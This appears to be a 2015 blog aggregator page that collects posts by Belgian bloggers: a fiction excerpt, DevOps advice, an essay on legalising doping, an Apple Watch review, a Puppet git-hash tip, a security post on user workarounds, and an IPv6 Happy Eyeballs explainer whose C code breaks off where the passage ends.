Bending down, Junior reveals a wide hatch set into the floor.
"This is the moment of truth. Grab the biggest box you can find!"

I grab one at random. Junior slides it into the hatch. The two openings line up perfectly.
"Well then, who goes first?"
"Me," Eva answers at once, without hesitating.

Before I have time to react, she slips into the plastic egg-like thing and curls up inside it. Only then do I notice that each box has a tiny screen on its front. Junior taps in the coordinates "A12-ZZ74".

"Eva, I'm not engaging the safety lock, so don't try to open the box until you've come to a complete stop."

Without giving her time to agree, he closes the hatch and presses the screen one last time. There is a sound of rushing air. Junior reopens the hatch. The space is now empty; Eva has disappeared.

"Next!" he announces with a smile, dropping a second box into the opening.
"But there's a problem! How are you going to enter the coordinates for your own box?" I say as I squeeze myself into the cramped receptacle.
"I'm going to have to be very quick."

I have barely managed to fold all my limbs into an uncomfortable foetal position when the hatch slams shut above my head. My lungs are suddenly compressed and, for a second, I have the impression that my eyes are trying to pop out of their sockets.

 

Photo by It is Elisa.

Thank you for taking the time to read this freely priced post. Feel free to support me with a few millibitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE licence.


by Lionel Dricot at July 21, 2015 09:14 PM

Frank Goossens

Want to beta-test Autoptimize power-ups?

So I’m currently working on “power-ups” for Autoptimize, which I might commercialize later this year. Some examples of functionality I’m developing;

Drop me a line if you're interested in beta-testing these power-ups, with a short description of where you would run the beta.

by frank at July 21, 2015 08:07 AM

July 20, 2015

Mattias Geniar

The Worst Possible DevOps Advice

The post The Worst Possible DevOps Advice appeared first on ma.ttias.be.

It's not a link-bait title; bear with me as I try to explain myself.

Every once in a while, I get asked the question of "how to be better at DevOps". This is an extremely confusing question, because it depends entirely on what DevOps means to you.

define ( 'DEVOPS' );

For some, it means Infrastructure As Code (Puppet, Chef, Ansible, ...). For others, it means collaborating between developers and operations more, exchanging ideas and documentation. Others see it as a single person doing both development and system operations.

Whatever DevOps means to you, it's OK.

There is no single definition that works for everyone, despite what Wikipedia might say.

To me, this is what DevOps means:

DevOps is about understanding each other. It's about developers understanding enough of the IT infrastructure to have it make sense. It's about sysadmins knowing enough about development to be able to speak on the same terms. Once you understand each others' vocabulary and system setup (both dev and ops), communication and collaboration comes naturally.

Once you start to collaborate, you can inherit each others' best practices and design patterns. You'd be amazed how much system administration and software development have in common in terms of writing code, testing, monitoring and automation.

With that said, how do you get better at DevOps?

Getting Better At DevOps

Well, this is the part where I hate to say the words.

You see, to me DevOps isn't a single person doing both development and operation. It's far from it. I think having both qualities, to be able to develop and manage your infrastructure, is very rare. You may think you're good at both, but chances are you're better at specializing in one area and focussing on it.

It's for this exact reason we all mock the recruiters looking for DevOps engineers, thinking they can find someone to fulfill both the developer and operations role in a company at the same time. That's just not how it works.

Yet, as much as I mock those recruiters (or the companies looking for that same silver bullet), DevOps is partly about Ops doing Dev work and Dev doing Ops work. Just not in the same way companies see it.

If you're {dev,ops}, try some {ops,dev}

What has helped me the most in my professional career, was the fact that I started as a developer and slowly switched to system administration. It gave me the background I needed to fully understand my role as a sysadmin.

The best piece of advice I can give anyone trying to get better at DevOps? Switch roles.

If you're an ops, try some dev

If you're currently a system administrator, try to write an application the same way your coworkers/clients would.

To put this in my perspective, from a hosting industry point-of-view, that means understanding mostly PHP (80%), Ruby (10%), Java (5%) & NodeJS (5%).

If you're a full-time sysadmin, try to write a web application in your spare time. Make it a hobby. Use a popular framework like Symfony, Laravel or Zend Framework 2. Use Composer. Write unit tests. Try some Test Driven Development (TDD). Deploy your code in an automated way.

Need a concrete challenge? Write a TODO-list application that can send reminders by mail when you've missed a time-based TODO (aka a deadline). It gives you UI design, background tasks, validation libraries through Composer, tests to write, ...
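To make that challenge a little more tangible, here is a minimal sketch of the core reminder job; the schema, table and email column are invented for illustration, and in a real application you would use your framework's mailer and scheduler instead of plain mail() and cron:

<?php
// Hypothetical cron job: mail a reminder for every TODO whose deadline has
// passed and that hasn't been reminded about yet. Schema and columns are made up.
$db    = new PDO('sqlite:todos.db');
$todos = $db->query(
    "SELECT id, title, owner_email FROM todos
     WHERE deadline < datetime('now') AND done = 0 AND reminded = 0"
);
foreach ($todos as $todo) {
    mail($todo['owner_email'], 'TODO overdue: ' . $todo['title'],
         'You missed the deadline for: ' . $todo['title']);
    $db->prepare('UPDATE todos SET reminded = 1 WHERE id = ?')
       ->execute([$todo['id']]);
}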

Understanding object-oriented designs, patterns like singleton & MVP, template engines, application-based caching layers, ... will all make you appreciate your sysadmin tasks even more.

It will give you insight in how the application needs to work together with the system.


If you're a dev, try some ops

If you're currently a developer, set up your own server and manage it yourself.

Install your own server, preferably the same kind your coworkers/clients would use, and manage it entirely by yourself. Try some Ansible to get a feel of infrastructure as code. Or try Chef or Puppet, if you're looking for a slightly more complex setup. Set up unit testing for your own infrastructure code. Check out ServerSpec.

Configure your own monitoring. Set up alerting. Play with the triggers until you get notified when needed, not sooner. Just set it up on the same server you're managing. Get a feel of what it's like to configure it entirely by yourself.

(So just to be safe, if you're actually going to use your own server, add some external monitoring as well. Installing the monitoring on the same server is just to get a feel of managing it entirely by yourself.)

Configure backups. Add some monitoring to your backups. Now secure your server. Add HTTPs. Add some firewalling. Benchmark your system and squeeze every last drop out of it.

Now that you have your system running, move every component to its own Docker container. Set up private networking and a persistent datastore. Expose only your public ports.

And then if you think you're ready, destroy your server and run a single configuration management command to completely deploy your server again from scratch, using the same infrastructure as code tools you just learned to use.

Dip Your Toes

So as much as I hate recruiters looking for the silver bullet, there is some truth to it. If you want to be a better sysadmin, try to be a dev. If you want to be a better dev, try to be a sysadmin. There, I just gave you the worst possible piece of DevOps advice. Right now, I'm sure there's some recruiter doing a happy dance for his victory.

Just understand that you're probably better off focussing on one area and keeping the other as a hobby. It's extremely hard to master both. Make sure you master one and play around with the other.

The post The Worst Possible DevOps Advice appeared first on ma.ttias.be.

by Mattias Geniar at July 20, 2015 07:07 PM

Joram Barrez

The Activiti Performance Showdown 2015

It’s been three years since we published the ‘The Activiti Performance Showdown‘, in which the performance of the Activiti engine (version 5.9 and 5.10) was benchmarked. Looking at my site analytics, it’s high in the top 10 of most read articles: up until today, 10K unique visits with an average time of 7 minutes (which is extraordinary in this […]

by Joram Barrez at July 20, 2015 11:23 AM

July 19, 2015

Lionel Dricot

For ethical, clean doping


As it does every year, the month of July brings us the traditional Tour de France and its inseparable doping debate, a debate which, fittingly enough, boosts the audience of the traditional media during this slow season.

The substance is always the same: the performances of certain cyclists are too incredible to be natural.

This argument, which demonstrates either total hypocrisy or a deep misunderstanding, has taken on a new dimension now that the vocabulary has shifted to "cheating" and contested victories are described as "stolen". There are now the "good guys" and the "cheating thieves".

 

What is doping?

Because, fundamentally, before any debate, that question is essential. So I'll let you think about it for a moment.

In fact, there is no clear or unanimously accepted definition of doping. It is nothing more or less than a perfectly arbitrary list of behaviours and substances that are banned because they are considered doping.

Historically, the very act of training was considered "unworthy of a gentleman" because it gave a non-negligible advantage over one's opponents.

With the progress of scientifically calibrated training and of nutrition, the boundaries between doping and simply eating, receiving treatment or training are becoming more and more blurred!

The swimmer Michael Phelps was even accused of doping for... listening to concentration-enhancing music before competitions!

 

Yes, but there is a list of banned substances!

Indeed. But that list varies from year to year and can differ depending on the country or the sport (even though some harmonisation work has been done)!

To add to the arbitrariness, some substances are considered doping except when there is a medical prescription. Which is why most endurance athletes now carry a doctor's note attesting that they are asthmatic.

On top of that, some substances reach us through our food. This is, incidentally, one of the arguments in favour of organic products: we are stuffed with all the antibiotics and hormones that are used to... dope the animals we eat.

Finally, most doping products merely increase the quantity of certain substances that are already naturally present in our bodies.

To that we must add substances which, although performance-enhancing, are perfectly allowed for cultural reasons. Caffeine, for example, which is a notable stimulant. After all, we're not going to ban a cup of coffee, are we? So cyclists are perfectly entitled to take capsules of concentrated caffeine a few kilometres from the finish, just to give themselves a boost for the final sprint. That's not doping!

 

Just set a limit for each substance, like blood alcohol levels for driving!

That is exactly what is done today, but it is, once again, completely arbitrary.

Some athletes, whether through genetics or because of their training, have very high values for certain indicators. Should they be penalised? Others, on the contrary, treat those indicators as the tolerated doping limit. Is that acceptable?

What is even funnier is that some practices are perfectly allowed (such as training at altitude) while others, which have exactly the same effect, are banned (auto-transfusion, or "altitude tents", which simulate altitude by creating a low-pressure environment).

 

Yes, but the performances are still superhuman!

Once again, this misunderstands doping. Doping does very little for raw performance: you don't become a champion by injecting yourself with a product.

Even if we assume that doping increases raw performance by 10% (which would be truly incredible), it would follow that a cyclist climbs a mountain pass at 21 km/h instead of 19 km/h. A difference that is absolutely imperceptible to the spectator in front of the television: both performances are superhuman!

Next to that, other factors have an enormous influence. Take one example at random: a rider who is well sheltered from the wind by his teammates for the duration of a stage reduces his effort by nearly 50%. If his equipment is very aerodynamic, he gains another 3 or 4%. That gives him a considerable advantage at the foot of the climb! If he slept better, if his digestion is a touch better, if his peak form was calibrated for that particular day, he will crush the competition. It is therefore completely irrational to accuse a rider of doping just because he gets the upper hand on his opponents during a climb!

Let's also note that we generally speak of a superhuman performance for a cyclist who finished with... one or two minutes' lead over his rival after nearly 200 km! As if that one minute marked the boundary between the natural and the supernatural.

By way of comparison, when I'm in great shape I can gain a minute on a course... of less than one kilometre! Professional cyclists are therefore all incredibly close in level. A journalist with a bit of perspective and intelligence should, on the contrary, be wondering why the performances are so similar.

Statistically, the problem is not that the winner has a one-minute lead. It's that the runner-up is only one minute behind!

 

You can't ride 200 km a day without doping! It's not human!

Just about every sport produces inhuman records. Most of us are incapable of reaching 20 km/h on foot, even over a short distance. Yet that is precisely the average speed at which marathon record holders run for 40 km, a distance that seems unimaginable to a beginning jogger.

Is it human to clear a bar nearly 2.50 m high without touching it? Is it human to long-jump nearly 9 m? To clear a bar at more than 6 m with a pole? To go more than 10 minutes without breathing? To descend, without breathing, to a depth of more than 100 m swimming nothing but breaststroke?

By definition, the champions of a sport are superhumans. In the most popular sports, future champions are spotted very young and follow a specific programme designed so that their growth optimises the muscles that will be used in their chosen sport.

They train all their lives and all year round; they never allow themselves the slightest dietary lapse. Their plate, their sleep (and sometimes their sexual activity) are regulated by an army of doctors. They are calibrated, to the day and the hour, to hit their optimal physical peak on the day of the competition.

On the day itself, they have the best equipment imaginable, a full entourage, and optimal concentration.

So is it really so surprising that their performances look abnormal?

 

Are you saying that cyclists aren't doped?

Not at all. It is even quite possible that most of them are, in one way or another and to varying degrees. Hence the total hypocrisy of going after the winner, who is probably no more doped than the others, especially when those others finish barely one or two minutes behind.

Doping is not black and white; it is a very complex affair.

Moreover, and I insist on this point, raw performances are in no way proof of doping.

Doping is not only about performance on competition day; it is also used during training, to build muscle mass and to push through the inevitable slump that comes on a day when the athlete would much rather stay home in their slippers. Doping is therefore far more subtle than some pill that would double your pedalling speed overnight.

 

Surely you're not suggesting we legalise doping?

Why not? At least it would be clear. There would be no hypocrisy.

Let's put the question differently: why are we unwilling to accept doping?

The only answer I can find is that, like drugs, doping is dangerous. Doped athletes put their health seriously at risk. With extreme doping, becoming an athlete would be suicidal (which, in my opinion, would boost the ratings, but let's move on...). Anti-doping rules are therefore there to protect them.

And yet, how do we fight doping? By hunting down and punishing... the very people we want to protect! Just like the war on junkies, the fight against doping cannot work that way. For athletes, doping is not a way to win: it is above all a way not to lose! In elite sport, it is not unusual for an athlete to feel that if their performances are no longer at the top, they will be out on the street overnight. Doping is therefore extremely tempting, even indispensable. It even shows up outside sport, in the world of work, where performance is also put under the microscope.

So I find it hard to blame an athlete who dopes. If anything, the lying and the hypocrisy shock me more. I would have the greatest respect for an athlete who confessed and explained the "system" in detail without being cornered into it by a judge.

On the other hand, I wonder how a doctor who takes part in all this can still look at himself in the mirror.

Why do we punish the athletes and let the doctors carry on practising with impunity? Along with those who, in full knowledge of the facts, paid those doctors' salaries.

To my mind, any doctor who has helped or encouraged a patient to take products potentially harmful to their health should be struck off the medical register and tried like a drug dealer. The sponsors and financiers should be convicted in the same way.

It is probably not the ultimate solution, but I remain convinced that going after the athletes is unjust and counterproductive. It would be like trying to fight drugs by punishing the junkies while openly letting the dealers and the kingpins operate.

Perhaps we could stop talking about doping and instead condemn those who, through their actions or their prescriptions, endanger other people's health. Elite sport could then be used to develop products and foods that help us live better and have a positive impact on health. Any product that turned out to be harmful, even in the very long term, would immediately be rejected by the riders themselves.

Elite sport would then become a positive engine of innovation, a laboratory for health and for knowledge of the human body, which it already is for equipment and technology.

In any case, as I described in "À l'ombre de la Grande Boucle", doping will soon become undetectable. Isn't it better, then, to turn it into something positive rather than keep hypocritically looking the other way?

 

In the long run, Coca-Cola and cigarettes are also extremely harmful. By your reasoning, those suppliers should be convicted too!

There you go: you have understood exactly where I was going with this.

 

Photo par Cold Storage.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.


by Lionel Dricot at July 19, 2015 09:44 AM

July 17, 2015

Frank Goossens

Music from Our Tube: shoegazing jazz-rocking wicked drummer

One of the many gems discovered while listening to random old “It is what it is” shows: Mice Parade‘s “Pretending”:

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Said Laurent:

The drummer always makes you think he's the guy from the Muppet Show; it's as if he has 42 hands and 75 drums. He plays like a madman, you'll see. The further the track goes, the more he plays.

by frank at July 17, 2015 01:18 PM

Mattias Geniar

My Apple Watch Review


I'm a gadget fan. After a few weeks of hesitating (it is expensive, isn't it?) I decided to get myself an Apple Watch. Here's my take on said watch and if I'd recommend it or not.

I bought the 42mm Watch Sport in Space Gray Aluminum. At around 500eur (overseas shipping included) it was the second cheapest Apple Watch. Only the smaller 38mm would have been around 50eur less.

Before you judge me, I'll admit it right here: that's an awful lot of money to be spending on a gadget.

Getting the watch in Belgium

The Apple Watch isn't officially on sale yet in Belgium, where I live. Our neighbouring countries, like France, the Netherlands and the UK, do sell it.

I placed my order around 3-4 weeks ago. Back then, I had a choice between France and the UK; the Netherlands wasn't an option yet. I could've ordered the watch online in France and picked it up in a store. It probably would have been a ~500km drive. I didn't do that.

I chose to order the watch in Apple UK and have it shipped to my Borderlinx account. Once it arrived, I used Borderlinx/DHL to ship it over to Belgium. It ended up costing me an additional 40eur in shipping though.

Unboxing

This is such a nerdy thing to be excited about.

But if you've ever gotten something from Apple, you know its packaging stands out. It is amazing, and the attention to detail really shows.

The Apple Watch Sport comes in a rectangular box. If you order the Apple Watch (not the sport), the packaging is different.

apple_watch_unboxing_1

Once opened, you're greeted with yet another box, with 2 handy pull-out strings to the sides.

apple_watch_unboxing_2

The box that comes out of it has a simple pull-string to remove the plastic surrounding it.

apple_watch_unboxing_3

Inside, the Watch is displayed with the default strap.

apple_watch_unboxing_4

Underneath the Watch are the accessories: the charging cable and plug.

apple_watch_unboxing_5

Below that, an additional strap is included. It's slightly shorter than the one it comes attached with, in case you have smaller wrists.

apple_watch_unboxing_6

Charging happens via induction. The Watch magnetically clicks to the charger. There's no USB or cable directly attached to the Watch.

apple_watch_unboxing_7

Starting & Syncing

The Watch works via bluetooth low energy, so it needs pairing with your iPhone. Traditional bluetooth pairing uses a 4-digit key code you enter on both devices to pair.

It doesn't quite work that way on the Watch. The pairing is best compared to a QR-code. You scan the watch with your phone, after which the pairing succeeds. The visuals included in the process are a stunning high-res pixel explosion.

apple_watch_sync

Once the sync is completed, the phone will start to sync your current Watch Compatible apps over to the Watch.

apple_watch_syncing_2 apple_watch_syncing_1


The animations on the Watch and the iPhone app are kept in perfect sync. It's these details that make the difference.

This process took longer than I would have thought. The Watch was easily syncing for 4-5 minutes.

Watchfaces

Several of the podcasts I listen to mentioned they were using the Utility watch face (like the ATP folks). I admit, it's a very nice watch face. It has sufficient options to reduce the details on-screen and to choose your own complications, the little widgets shown in the corners and at the bottom of the watch.

apple_watch_face_1

I changed to the Solar watch face for a few days, because I liked its simplicity. Just a clock and a nice HD animation of the sunrise and sunset.

apple_watch_face_solar

I eventually swapped it out for the Modular watch face, which I'm still using now. The lack of complications on the Solar watch face was a deal breaker.

apple_watch_face_current

It's super convenient to have a couple of complications on-screen: date, temperature and the activity tracking rings.

Time to stand!

If enabled, every hour the watch will tap you slightly and motivate you to take a small walk. Stretch those legs a bit.

It's a fun feature. I'm not sure if I'll still obey the watch after our gadget-honeymoon period, but for now it's a cool novelty that gets me to stand up a little more during the day.

apple_watch_stand_reminder

The only downside: if you're taking a nap during the day, this'll tap your wrist and will probably wake you.

Taps, taps and taps

Among nerds, it's pretty well known that the Apple Watch doesn't vibrate on notifications, it taps.

It isn't just a marketing term, it actually feels like a tap. Definitely not a vibration on the watch, more of a gentle nudge.

Which brings me to the downside of taps vs. vibrations: they can go by unnoticed.

There's an option called Prominent Haptic Feedback on the watch. It'll tap you an additional time on notifications.

apple_watch_prominent_haptic

Even with that option, I keep missing taps. I feel a vibrating watch would probably have caught my attention better.

While it certainly isn't the end of the world to miss a few notifications, it is inconvenient. And in a job where being on-call means responding to text alerts and push notifications, it can be annoying.

Watch vs. Phone

The Watch needs the Phone to work. Its standalone functions are extremely limited.

Yet while the watch needs the phone, I notice I am using the phone less. I'm less distracted.

We've all done the routine where we get a notification on the phone, check it out, open a completely unrelated app (out of reflex, automation, ...) and start browsing the web or reading tweets. Once the phone gets my attention, it keeps my attention.

Since the watch is such a limited device in terms of input, it's mostly a read-only device to me. I read my notifications, perhaps answer with some canned responses or dictated message. But I won't go reading the news on it. Or opening Twitter. Or read all my mails.

It's strange how a device with fewer features than the phone managed to reduce my time on the phone.

Hey Siri, ...

The only means of input on the watch is via dictation. That means you talk to Siri.

I'll be honest: I still feel like a complete douchebag when I'm talking to Siri and dictating text or a command. I'll never do this in public or in front of others.

It is convenient when I'm in the car or when I'm alone. In all other circumstances, I'll actively try to avoid using it.

Other than that, I find that Siri dictation gets my input right around 75% of the time. The rest of the time it either completely fails to work or misinterprets my voice entirely. A 75% success ratio is terrible if it's your only means of giving input.

Battery Life

Not an issue, at all.

apple_watch_charged_evening

After a full day of usage, I never got it below 60% battery when I went to sleep.

If you want to use it as a sleep tracking device, it'll surely survive a 24 hour period. You can charge it during the day or on your commute to work.

Apps

There aren't a lot of apps I use on the device. Here are the ones that stand out to me.

I'm curious what watchOS 2.0 will bring in terms of additional functionality.

The 2.0

Speaking of new releases, I'm wondering if Apple will launch version 2.0 of the Watch hardware anytime soon.

The iPhone cycle is very clear: every 2 years there's a new model, every other year the current model gets an internal hardware upgrade.

To me, the Watch has sufficiently strong hardware: retina/HD display, it's responsive enough, the touchscreen works flawlessly, ...

Apple has an obsession with the thinness of its devices. At each iteration, they'll attempt to make them thinner. I suspect that's what will happen to the Watch as well. There's no need for a faster CPU or more memory, but the next version will be thinner. And at that point I'll look at this watch and realise how bulky it looks.

Even though at this point, the watch doesn't feel heavy or thick, at all.

Managing calls

One of the most useful features, to me, is being able to identify a caller without looking at your phone. The phone is usually buried somewhere in a jeans pocket and it isn't always convenient to take it out.

The watch instantly shows you who's calling. You can even answer the call on the watch, quietly walk to your phone and resume the call there via handoff.

apple_watch_caller_id

If you scroll down on the watch during a call, you get to pick from some canned responses to answer with. You don't need to look at your phone anymore.

apple_watch_caller_actions

The "answer on the phone" option will answer the call and place it in a sort of "hold" state, until you can get to your phone and resume the call, in case you don't like talking to your Watch like inspector gadget.

This kind of detachment from my phone has changed how I keep my phone with me. Now, I can more easily leave the phone on my nightstand or in the kitchen, and comfortably walk around knowing I can still receive calls and be alerted to text messages.

Until the Watch, I anxiously kept my phone with me at all times, for the fear of missing out.

Conclusion: Expensive Gadget

After one week of usage, I can conclude what I had expected when buying the Apple Watch: it's an expensive gadget that's really fun to play with.

The Watch keeps me more focused, with less time spent on my phone. Notifications are very convenient to have on your wrist. The sport/activity tracking motivates me to get up and walk.

Its functionality is limited though. It's a watch, but not a smart watch per se. I look forward to the Google Now alternative from Apple. I believe the Watch has everything it needs to become a really powerful platform and a great extension of your phone.

Would I recommend you get a watch? If you like gadgets, appreciate the Apple ecosystem and have some money to spare, then yes: get one.

If you just have an iPhone, the Watch probably doesn't offer that much additional benefit. If you're heavily invested in the Apple ecosystem (Apple TV, Airplay, Mac, iPhone, iPad, ...), the Watch has more to offer since it interacts with each of those devices flawlessly.

If you're looking for a brutally honest Apple Watch review, I highly recommend The Oatmeal's "8 things I learned from wearing an Apple Watch for a couple of weeks".


by Mattias Geniar at July 17, 2015 06:53 AM

July 15, 2015

Lionel Dricot

As a child, I hoped one day…

As a child, I already didn't like eating. I hoped, without really believing it, that one day I could simply take pills containing everything I needed and no longer be bothered with food. After all, that existed in most of the science-fiction books I devoured.

Today, even if they aren't quite pills, we are not far off, and I am a happy man.

As a child, I was not careful with paperwork. My handwriting was not very pretty and all my sheets of paper got crumpled immediately. The punched holes tore and pages flew loose in the middle of my binders. I hated putting reinforcement rings on the holes. Being neat seemed to me a waste of time and utterly pointless. As a teenager, I even drew up plans for a hole punch that applied the reinforcement rings automatically (later dubbed the "dricoratrice" by classmates). Going back to the problem, I then imagined injecting resin directly into the hole to strengthen it. Later, after reading an article in Science & Vie Junior about a prototype of "electronic paper", I imagined having a binder containing a single electronic sheet and a keyboard, to take notes directly. In class, rather than photocopying, the teacher would simply transmit an "electronic sheet" that would automatically appear in our binders.

Today, I no longer print. Any document I want is scanned with one tap on my phone and is available on my computer, my phone and my tablet.

As a child, I loved reading, and every second spent away from books felt like a second lost. But the heavy, bulky volumes mostly stayed at home and were not very practical. On car journeys, I could only read in daylight, straining my eyes until the very last second of dusk. I had imagined what I called "thumb reading": a small electronic chip that would hold my entire library and send the story contained in a book straight to my brain, through the nerve in my arm. I would be able to read all the time, even in the dark, without even stopping to change books.

Today, my e-reader never leaves me. I permanently carry the ultimate library, one that also contains new works put online the day before by their author and which will, perhaps, never be printed. I can read standing up, in a queue, in the evening, in the dark. Without even pausing between two books.

As a child, I was incredibly frustrated that the Voyager probes had not passed close to Pluto. I was passionate about the solar system and space exploration, and I wanted to be able to picture Pluto, my favourite planet.

Today, after having discovered the surface of Titan, I am deeply moved to discover the face of Pluto.

Every day, I appreciate how lucky I am to live in the future, to see my childhood dreams come true.

Photos by Sergey Galyonkin and Nasa.

Thank you for taking the time to read this freely paid post. Feel free to support me with a few milliBitcoins, a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.


by Lionel Dricot at July 15, 2015 05:30 PM

Laurent Bigonville

Print git hash during puppet run

So here's a little trick that I implemented at a customer.

During each puppet run, the git commit hash of the puppet manifest being applied is printed in the logs instead of a timestamp:

# puppet agent -t
Info: Retrieving pluginfacts
Info: Retrieving plugin
Info: Loading facts
Info: Caching catalog for host1.example.com
Info: Applying configuration version ’38f861974ef7041752c0051cfbca676544dc1cef’
Notice: Finished catalog run in 9.78 seconds

To achieve that, I'm just storing the git hash in a file (something like "echo $GIT_COMMIT > .gitversion") when building the package in Jenkins, and then shipping that file in the RPM.

In the puppet server configuration I have the following line:

config_version = /bin/cat $confdir/environments/$environment/.gitversion

by bigon at July 15, 2015 01:05 PM

Frank Goossens

Going Norway or the highway

So we went to Norway for our summer vacation this year. Beautiful country, lots of fjords and lots of waterfalls and lots of tunnels too (the longest one over 24km, the trip back over the mountains was all the more impressive).

Just one picture here (friends & family saw a lot more on FB), with me and my two lovely ladies at the Stegastein viewpoint:

stegastein_norway_holiday_2015

by frank at July 15, 2015 09:41 AM

July 14, 2015

Xavier Mertens

Don’t (always) blame the user!

Often, as security professionals, we tend to blame our users. Not all people are security aware and take the right decision when facing a potential security issue. Yes, we know: they click, they open, they answer questions, they trust, …


But let’s be realistic, sometimes they make bad actions just because of us. Our mission is to protect our employer’s or customer’s data and their team members against more and more threats. To achieve this, we take decisions for their own sake: we deploy new tools, new controls and procedures. We get paid for this job as well as the users: they get paid too to perform other tasks. Today, computers are everywhere and almost all people working in a company have to use them and network resources.

I was browsing through the huge amount of data leaked from HackingTeam, searching for juicy information about Belgium. I found an email with this signature:

>LASTNAME Firstname
>Position
>Department/Organization
>Tel : +32-xxx.xxx.xxx
>Tel : +32-x.xxx.xx.xx
>Belgium
>user@<organization>.be (without attachment)
>nick@<well-known-isp>.be (attachment OK)

My first reaction was a big "WTF?!?". He/she asks external contacts to send attachments to a private mailbox hosted by a well-known Belgian ISP. Is this mailbox properly protected? Does he/she use a strong password? Is the password shared across multiple services? We know that attachments may potentially contain very sensitive information!

After that first reaction and a few deep breaths, I took some time to think it through. Maybe this is the only way for this user to receive files from external contacts. The system in place in his/her organization might be too restrictive, too slow, or undersized to handle the total amount of processed data. I don't know the reason, but one thing is for sure: humans are excellent at finding ways around restrictions to get their stuff. From his/her point of view, the employee is just trying to get things done. Let's go back to the example above. IMHO, trying to block everything at all costs is the wrong approach. We often forget that the IT department is offering services to the end users. It implements tools to help them work efficiently, and the same goes for security. We have to implement tools and procedures that help people work in a safe environment.

The next time you reject a request from a user for "security reasons", don't just say "No!" but "No, because…". Explain why and propose an alternative that best matches his/her requirements and yours (from a security point of view). In the example described in this post, if people must exchange files with external contacts, why not deploy a file sharing service coupled with strong scanning of the incoming files? Everything is possible but requires investing some time and money… Wait… Maybe that's the real problem? :-(

 

by Xavier at July 14, 2015 02:34 PM

Frank Goossens

Zap Flash before it zaps you

Lots of 0-day exploits on Flash, supposedly due to a hacking-for-money company having been hacked. Remove or disable Flash if you value your security!

by frank at July 14, 2015 10:58 AM

July 13, 2015

Mattias Geniar

Apple Favours IPv6, Gives IPv4 a 25ms Penalty


This is pretty exciting news for the adoption of IPv6.

Last month, Apple announced that all iOS9 apps need to be "IPv6 compatible".

Because IPv6 support is so critical to ensuring your applications work across the world for every customer, we are making it an AppStore submission requirement, starting with iOS 9.

In this case, compatible just means the applications should implement the NSURLSession class (or a comparable alternative), which will translate DNS names to either AAAA (IPv6) or A (IPv4) records, depending on which one is available.

It doesn't mean the actual hostnames need to be IPv6. You can still have a IPv4-only application, as long as all your DNS-related system calls are done in a manner that would allow IPv6, if available.

But to further encourage IPv6 adoption, Apple has just motivated all its app developers to use IPv6 where applicable: IPv4 networks will get a 25ms penalty compared to IPv6 connections.

Apple implemented "Happy Eyeballs", an algorithm published by the IETF which can make dual-stack applications (those that understand both IPv4 and IPv6) more responsive to users, avoiding the usual problems faced by users with imperfect IPv6 connections or setups.

Since its introduction into the Mac OSX line 4 years ago, Apple has pushed a substantial change to the implementation for the next Mac OSX release "El Capitan".

1. Query the DNS resolver for A and AAAA.
If the DNS records are not in the cache, the requests are sent back to back on the wire, AAAA first.

2. If the first reply we get is AAAA, we send out the v6 SYN immediately

3. If the first reply we get is A and we're expecting a AAAA, we start a 25ms timer
-- If the timer fires, we send out the v4 SYN
-- If we get the AAAA during that 25ms window, we move on to address selection
[v6ops] Apple and IPv6 -- Happy Eyeballs

In other words: DNS calls are done in parallel, both for an AAAA record and an A record. Before the answer to the A record is accepted, at least 25ms must have passed waiting for a potential response to the AAAA query.

RFC6555, which describes the Happy Eyeballs algorithm, notes that Firefox and Chrome use a 300ms penalty timer.

1. Call getaddrinfo(), which returns a list of IP addresses sorted by the host's address preference policy.

2. Initiate a connection attempt with the first address in that list (e.g., IPv6).

3. If that connection does not complete within a short period of time (Firefox and Chrome use 300 ms), initiate a connection attempt with the first address belonging to the other address family (e.g., IPv4).

4. The first connection that is established is used. The other connection is discarded.
RFC6555

Apple's implementation isn't as strict as Chrome's or Firefox's, but it is making a very conscious move to push for IPv6 adoption. I reckon it's good news for Belgian app developers, as we're leading the IPv6 adoption charts.
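To make that concrete, here is a minimal, self-contained C sketch of the simple Happy Eyeballs recipe quoted above from RFC6555. It is not Apple's code (Apple applies its 25ms preference at the DNS stage) and it skips step 4's true connection racing: it just resolves both address families, gives each IPv6 address a short window to connect, and only then falls back to IPv4. The host, port and timer values are placeholders.

/* happy_eyeballs.c -- an illustrative sketch, not Apple's implementation.
 * Resolve both A and AAAA records, try IPv6 first and give each attempt a
 * short window (300 ms here, the timer Firefox/Chrome use; Apple applies
 * its 25 ms preference at the DNS stage) before falling back to IPv4.
 * Build with: cc happy_eyeballs.c -o happy_eyeballs
 */
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/select.h>
#include <sys/socket.h>

/* Non-blocking connect that waits at most timeout_ms for completion. */
static int try_connect(const struct addrinfo *ai, int timeout_ms)
{
    int fd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
    if (fd < 0)
        return -1;
    fcntl(fd, F_SETFL, O_NONBLOCK);
    if (connect(fd, ai->ai_addr, ai->ai_addrlen) == 0)
        return fd;                              /* connected immediately */
    if (errno != EINPROGRESS) {
        close(fd);
        return -1;
    }
    fd_set wfds;
    FD_ZERO(&wfds);
    FD_SET(fd, &wfds);
    struct timeval tv = { timeout_ms / 1000, (timeout_ms % 1000) * 1000 };
    int err = 0;
    socklen_t len = sizeof(err);
    if (select(fd + 1, NULL, &wfds, NULL, &tv) == 1 &&
        getsockopt(fd, SOL_SOCKET, SO_ERROR, &err, &len) == 0 && err == 0)
        return fd;                              /* connected within the window */
    close(fd);
    return -1;
}

/* Resolve both families, prefer IPv6, fall back to IPv4. */
static int happy_connect(const char *host, const char *port)
{
    struct addrinfo hints, *res, *ai;
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;                /* ask for both A and AAAA */
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, port, &hints, &res) != 0)
        return -1;
    int fd = -1;
    for (ai = res; ai && fd < 0; ai = ai->ai_next)   /* IPv6 gets the head start */
        if (ai->ai_family == AF_INET6)
            fd = try_connect(ai, 300);
    for (ai = res; ai && fd < 0; ai = ai->ai_next)   /* then fall back to IPv4 */
        if (ai->ai_family == AF_INET)
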